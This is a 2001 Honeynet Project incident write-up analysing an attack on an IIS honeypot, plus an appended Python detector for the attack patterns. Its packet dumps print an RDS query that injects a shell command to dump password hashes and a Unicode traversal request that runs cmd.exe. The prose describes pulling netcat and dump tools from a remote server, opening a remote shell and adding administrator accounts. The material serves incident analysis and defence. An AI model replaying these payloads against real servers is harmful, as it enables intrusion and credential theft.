From armando_leite@hotmail.com Fri Apr 20 20:30:05 2001
Date: Tue, 10 Apr 2001 12:07:46 -0000
From: Armando Leite
To: project@honeynet.org
Subject: Scan of the month

Hey guys,

Excellent project. Excellent development opportunity for all those submitting entries!

cheers,
Armando

**********************************************************************
Which exploit(s) were used to attack the system?
**********************************************************************

Vulnerability 1 - RDS/IIS Vulnerability - Bugtraq ID 529

This can be seen from the following packet dump (amongst SEVERAL others):

-----
02/04-13:34:15.232822 213.116.251.162:1799 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11249 IpLen:20 DgmLen:753 DF
***AP*** Seq: 0x965E643C Ack: 0x2CB6D00A Win: 0x2238 TcpLen:
50 4F 53 54 20 2F 6D 73 61 64 63 2F 6D 73 61 64  POST /msadc/msad
63 73 2E 64 6C 6C 2F 41 64 76 61 6E 63 65 64 44  cs.dll/AdvancedD
61 74 61 46 61 63 74 6F 72 79 2E 51 75 65 72 79  ataFactory.Query
20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D   HTTP/1.1..User-
41 67 65 6E 74 3A 20 41 43 54 49 56 45 44 41 54  Agent: ACTIVEDAT
41 0D 0A 48 6F 73 74 3A 20 6C 61 62 2E 77 69 72  A..Host: lab.wir
65 74 72 69 70 2E 6E 65 74 0D 0A 43 6F 6E 74 65  etrip.net..Conte
6E 74 2D 4C 65 6E 67 74 68 3A 20 35 35 39 0D 0A  nt-Length: 559..
43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70  Connection: Keep
2D 41 6C 69 76 65 0D 0A 0D 0A 41 44 43 43 6C 69  -Alive....ADCCli
65 6E 74 56 65 72 73 69 6F 6E 3A 30 31 2E 30 36  entVersion:01.06
0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20  ..Content-Type:
6D 75 6C 74 69 70 61 72 74 2F 6D 69 78 65 64 3B  multipart/mixed;
20 62 6F 75 6E 64 61 72 79 3D 21 41 44 4D 21 52   boundary=!ADM!R
4F 58 21 59 4F 55 52 21 57 4F 52 4C 44 21 3B 20  OX!YOUR!WORLD!;
6E 75 6D 2D 61 72 67 73 3D 33 0D 0A 0D 0A 2D 2D  num-args=3....--
21 41 44 4D 21 52 4F 58 21 59 4F 55 52 21 57 4F  !ADM!ROX!YOUR!WO
52 4C 44 21 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79  RLD!..Content-Ty
...
00 65 00 20 00 43 00 69 00 74 00 79 00 3D 00 27  .e. .C.i.t.y.=.'
00 7C 00 73 00 68 00 65 00 6C 00 6C 00 28 00 22  .|.s.h.e.l.l.(."
00 63 00 6D 00 64 00 20 00 2F 00 63 00 20 00 70  .c.m.d. ./.c. .p
00 64 00 75 00 6D 00 70 00 2E 00 65 00 78 00 65  .d.u.m.p...e.x.e
00 20 00 3E 00 3E 00 20 00 6E 00 65 00 77 00 2E  . .>.>. .n.e.w..
00 70 00 61 00 73 00 73 00 22 00 29 00 7C 00 27  .p.a.s.s.".).|.'
00 08 00 B2 00 00 00 64 00 72 00 69 00 76 00 65  .......d.r.i.v.e
...
-----

Vulnerability 2 - Microsoft IIS Extended Unicode Directory Traversal Vulnerability - Bugtraq ID 1806

As shown in the following packet dump:

-----
02/04-14:54:13.004647 213.116.251.162:2187 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:17014 IpLen:20 DgmLen:542 DF
***AP*** Seq: 0xDEDF537B Ack: 0x2D0004E5 Win: 0x2238 TcpLen:
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 43 30  GET /msadc/..%C0
25 41 46 2E 2E 2F 2E 2E 25 43 30 25 41 46 2E 2E  %AF../..%C0%AF..
2F 2E 2E 25 43 30 25 41 46 2E 2E 2F 70 72 6F 67  /..%C0%AF../prog
72 61 6D 25 32 30 66 69 6C 65 73 2F 63 6F 6D 6D  ram%20files/comm
6F 6E 25 32 30 66 69 6C 65 73 2F 73 79 73 74 65  on%20files/syste
6D 2F 6D 73 61 64 63 2F 63 6D 64 31 2E 65 78 65  m/msadc/cmd1.exe
3F 2F 63 2B 64 65 6C 2B 66 74 70 63 6F 6D 20 48  ?/c+del+ftpcom H
54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 70 74 3A  TTP/1.1..Accept:
...
-----

**********************************************************************
How were the exploits used to access and control the system?
**********************************************************************

Initially the intruder creates a file using the RDS flaw with instructions to retrieve the following "tools" from a remote FTP server: pdump.exe, nc.exe, samdump.dll. He tries to do this by "FTPing" to www.nether.net, which fails (Login Incorrect - as can be seen in the logs related to 204.42.253.18).

This happens between the following times:

starting at 02/04-13:32:51.574859 213.116.251.162:1778
up to 02/04-13:34:29.400851 213.116.251.162:1803

Eventually (he fails several times before getting it right), he obtains the tools by downloading them from his own server.

The whole analysis is based on reviewing all the logs available one by one. Very low-tech, but "vi" is your friend (and to be truthful, in this case, there aren't any other options I know of...).

Using nc, he runs a shell on a high port number (6969) and logs onto the server (packet 02/04-13:42:49.263766 172.16.1.106:6969). This shell is run using the Unicode flaw. As such, the user doesn't have Admin privileges on the server when he logs in initially.

**********************************************************************
What was done once access was gained?
**********************************************************************

The intruder adds the anonymous users "IUSR_KENNY" and "IWAN_KENNY" to the administrators group, using the RDS bug (packet 02/04-13:56:05.379837 213.116.251.162:1946).

Tries to obtain a copy of SAM._ but fails. Copies it, using the MSDAC flaw, to a file. Copies the file to the webtree and downloads it.

Browses around the filesystem, deletes files he created previously, looks in the tempting "Exploits" directory.

What he does is very repetitive. Usually, failing some command in the interactive shell and then using RDS to execute it. Tries to download the tools 3 or 4 times before getting it right.

**********************************************************************
How could this attack have been prevented?
**********************************************************************

To fix vulnerability 1:

--Install the latest version of MDAC 2.1.2.4202.3 (GA) (also known as MDAC 2.1 SP2) from:
http://www.microsoft.com/data/download.htm

To fix vulnerability 2:

Patch available
IIS 4.0 -- http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
IIS 5.0 -- http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp

Also, depending on the purpose of the server, maybe outgoing connections should be blocked by a firewall. This would prevent the FTP session. But there would always be damage. Patch the thing.

**********************************************************************
How much time did you spend on this analysis and writeup?
**********************************************************************

I would say about 20 hours. There's lots of data to go through and this is just a summary; much more detail could be added.

**********************************************************************
Do you feel that the attacker in question knew if this was a honeypot? If so, why or why not?
**********************************************************************

I think he did, or at some point realized it was. Take a look at this:

02/04-13:50:51.320224 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:6523 IpLen:20 DgmLen:144 DF
***AP*** Seq: 0x2CBEF8AB Ack: 0x9E43FD5A Win: 0x1FF7 TcpLen:
65 63 68 6F 20 48 69 2C 20 69 20 6B 6E 6F 77 20  echo Hi, i know
74 68 61 74 20 74 68 69 73 20 61 20 08 08 69 73  that this a ..is
20 61 20 6C 61 62 20 73 65 72 76 65 72 2C 20 62   a lab server, b
75 74 20 70 61 74 63 68 20 74 68 65 20 68 6F 6C  ut patch the hol
65 73 21 20 3A 2D 29 20 3E 3E 52 45 41 44 4D 45  es! :-) >>README
2E 4E 4F 57 2E 48 61 78 30 72 0D 0A 0D 0A 43 3A  .NOW.Hax0r....C:
5C 3E 0D 0A 43 3A 5C 3E                          \>..C:\>

And there's also the download of a file with strange content:

02/04-14:36:02.630415 213.116.251.162:2091 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:15308 IpLen:20 DgmLen:445 DF
***AP*** Seq: 0xCE616077 Ack: 0x2CEF61E1 Win: 0x2238 TcpLen:
47 45 54 20 2F 74 65 73 74 2E 74 78 74 20 48 54  GET /test.txt HT
54 50 2F 31 2E 31 0D 0A 41 63 63 65 70 74 3A 20  TP/1.1..Accept:
...

02/04-14:36:02.634340 172.16.1.106:80 -> 213.116.251.162:2091
TCP TTL:127 TOS:0x0 ID:20865 IpLen:20 DgmLen:287 DF
***AP*** Seq: 0x2CEF61E1 Ack: 0xCE61620C Win: 0x20A3 TcpLen:
48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D  HTTP/1.1 200 OK.
0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F  .Server: Microso
66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65  ft-IIS/4.0..Date
3A 20 53 75 6E 2C 20 30 34 20 46 65 62 20 32 30  : Sun, 04 Feb 20
30 31 20 31 33 3A 33 34 3A 35 38 20 47 4D 54 0D  01 13:34:58 GMT.
0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74  .Content-Type: t
65 78 74 2F 70 6C 61 69 6E 0D 0A 41 63 63 65 70  ext/plain..Accep
74 2D 52 61 6E 67 65 73 3A 20 62 79 74 65 73 0D  t-Ranges: bytes.
0A 4C 61 73 74 2D 4D 6F 64 69 66 69 65 64 3A 20  .Last-Modified:
53 75 6E 2C 20 30 34 20 46 65 62 20 32 30 30 31  Sun, 04 Feb 2001
20 31 33 3A 33 34 3A 32 32 20 47 4D 54 0D 0A 45   13:34:22 GMT..E
54 61 67 3A 20 22 66 30 65 66 66 30 32 65 61 66  Tag: "f0eff02eaf
38 65 63 30 31 3A 62 38 35 22 0D 0A 43 6F 6E 74  8ec01:b85"..Cont
65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 0D 0A  ent-Length: 21..
>> 0D 0A 74 68 69 73 20 63 61 6E 27 74 20 62 65 20  ..this can't be
>> 74 72 75 65 20 0D 0A                             true ..

Which was actually created by someone else -> 202.85.60.156

TCP TTL:48 TOS:0x0 ID:6045 IpLen:20 DgmLen:76 DF
***AP*** Seq: 0x369CD047 Ack: 0x2CE1D4E7 Win: 0x7D78 TcpLen: 20
65 63 68 6F 20 74 68 69 73 20 63 61 6E 27 74 20  echo this can't
62 65 20 74 72 75 65 20 3E 20 74 65 73 74 2E 74  be true > test.t

Funny to see that after the file is created there's a bunch of people checking the file. They were in touch with their mates... :)
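The two request patterns this submission identifies lend themselves to a small parser-plus-detector. The following is an added example, not part of Armando's submission or the Honeynet Project's material: it reads dumps in the Snort-style layout quoted above, reassembles the payload bytes from the hex columns, flags requests for the RDS DataFactory endpoint, decodes overlong UTF-8 escapes the way a permissive decoder would so the canonical path a `%C0%AF` traversal resolves to is visible, and recovers the UTF-16LE query text in which the RDS `shell(...)` call travels (a byte-wise search for the ASCII string never matches it). The rule names and the `SAMPLE_DUMP` input (rows re-typed from the dumps above, abridged) are my own.

```python
"""Parse Snort-style packet dumps (the layout quoted in the writeup) and flag
the two IIS request patterns the analysis identifies.  Added example, not code
from the writeup; the sample input is re-typed from its dumps and abridged."""
import re
from urllib.parse import unquote_to_bytes

HEADER_RE = re.compile(r"^(\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+(\S+)\s+->\s+(\S+)$")
HEX_PAIR_RE = re.compile(r"^[0-9A-Fa-f]{2}$")
UTF16_RUN_RE = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")   # 8+ printable UTF-16LE chars
RDS_PATH = "/msadc/msadcs.dll"                            # RDS DataFactory endpoint

def parse_packets(dump_text):
    """A timestamp header starts a packet; each following hex row adds up to 16
    payload bytes.  Snort's ASCII gutter to the right of the hex pairs is ignored."""
    packets, current = [], None
    for line in dump_text.splitlines():
        m = HEADER_RE.match(line.strip())
        if m:
            current = {"ts": m[1], "src": m[2], "dst": m[3], "payload": bytearray()}
            packets.append(current)
            continue
        pairs = []
        for tok in line.split()[:16]:            # at most 16 bytes per row
            if not HEX_PAIR_RE.match(tok):
                break                            # reached the ASCII gutter
            pairs.append(tok)
        if current is not None and len(pairs) >= 2:   # non-hex rows (flags etc.) skipped
            current["payload"] += bytes.fromhex("".join(pairs))
    return packets

def request_line(payload):
    """Return (method, target) if the payload starts with an HTTP request line."""
    parts = bytes(payload).split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    if len(parts) == 3 and parts[0].isalpha() and parts[2].startswith("HTTP/"):
        return parts[0], parts[1]
    return None

def lenient_utf8_decode(raw):
    """Decode like a permissive decoder: a 2-byte sequence led by 0xC0/0xC1 is
    always overlong (it encodes a code point below 0x80) but is accepted here and
    mapped to that code point, so %C0%AF turns into '/'.  Returns (text, overlongs)."""
    out, overlong, i = [], [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            if b in (0xC0, 0xC1):
                overlong.append(bytes(raw[i:i + 2]))
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:                                    # ASCII, or a stray byte kept as latin-1
            out.append(chr(b))
            i += 1
    return "".join(out), overlong

def utf16le_strings(payload):
    """RDS carries its query text as UTF-16LE, so a byte-wise 'shell(' grep misses it."""
    return [m.group().decode("utf-16-le") for m in UTF16_RUN_RE.finditer(bytes(payload))]

def analyze(dump_text):
    """One finding per matched rule; 'path' on traversal findings is the canonical path."""
    findings = []
    for pkt in parse_packets(dump_text):
        base = {"ts": pkt["ts"], "src": pkt["src"], "dst": pkt["dst"]}
        req = request_line(pkt["payload"])
        if req:
            path = req[1].split("?", 1)[0]
            if path.lower().startswith(RDS_PATH):
                findings.append({**base, "rule": "rds-datafactory", "detail": " ".join(req)})
            decoded, overlong = lenient_utf8_decode(unquote_to_bytes(path))
            if overlong and "/../" in decoded:
                findings.append({**base, "rule": "overlong-utf8-traversal", "path": decoded,
                                 "detail": f"{len(overlong)} overlong sequence(s)"})
        for text in utf16le_strings(pkt["payload"]):
            if "shell(" in text.lower():
                findings.append({**base, "rule": "rds-query-shell", "detail": text})
    return findings

# Constructed sample: rows re-typed from the writeup's dumps; elided rows dropped.
SAMPLE_DUMP = """\
02/04-13:34:15.232822 213.116.251.162:1799 -> 172.16.1.106:80
50 4F 53 54 20 2F 6D 73 61 64 63 2F 6D 73 61 64  POST /msadc/msad
63 73 2E 64 6C 6C 2F 41 64 76 61 6E 63 65 64 44  cs.dll/AdvancedD
61 74 61 46 61 63 74 6F 72 79 2E 51 75 65 72 79  ataFactory.Query
20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D   HTTP/1.1..User-
6E 74 2D 4C 65 6E 67 74 68 3A 20 35 35 39 0D 0A  nt-Length: 559..
00 65 00 20 00 43 00 69 00 74 00 79 00 3D 00 27  .e. .C.i.t.y.=.'
00 7C 00 73 00 68 00 65 00 6C 00 6C 00 28 00 22  .|.s.h.e.l.l.(."
00 63 00 6D 00 64 00 20 00 2F 00 63 00 20 00 70  .c.m.d. ./.c. .p
00 64 00 75 00 6D 00 70 00 2E 00 65 00 78 00 65  .d.u.m.p...e.x.e
00 20 00 3E 00 3E 00 20 00 6E 00 65 00 77 00 2E  . .>.>. .n.e.w..
00 70 00 61 00 73 00 73 00 22 00 29 00 7C 00 27  .p.a.s.s.".).|.'

02/04-14:54:13.004647 213.116.251.162:2187 -> 172.16.1.106:80
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 43 30  GET /msadc/..%C0
25 41 46 2E 2E 2F 2E 2E 25 43 30 25 41 46 2E 2E  %AF../..%C0%AF..
2F 2E 2E 25 43 30 25 41 46 2E 2E 2F 70 72 6F 67  /..%C0%AF../prog
72 61 6D 25 32 30 66 69 6C 65 73 2F 63 6F 6D 6D  ram%20files/comm
6F 6E 25 32 30 66 69 6C 65 73 2F 73 79 73 74 65  on%20files/syste
6D 2F 6D 73 61 64 63 2F 63 6D 64 31 2E 65 78 65  m/msadc/cmd1.exe
3F 2F 63 2B 64 65 6C 2B 66 74 70 63 6F 6D 20 48  ?/c+del+ftpcom H
54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 70 74 3A  TTP/1.1..Accept:
"""

if __name__ == "__main__":
    print(*analyze(SAMPLE_DUMP), sep="\n")
```

Run directly it prints three findings: the RDS POST, the `shell("cmd /c pdump.exe >> new.pass")` text recovered from the UTF-16LE query, and the traversal request with its canonical path `/msadc/../../../../../../program files/common files/system/msadc/cmd1.exe`. On a real capture, pass `analyze()` the text of Snort sniffer-mode output (`-d -v`). The overlong check is generic: any 2-byte UTF-8 sequence whose lead byte is 0xC0 or 0xC1 is illegal whatever character it smuggles, so the rule does not depend on the exact `%C0%AF` string seen in this incident.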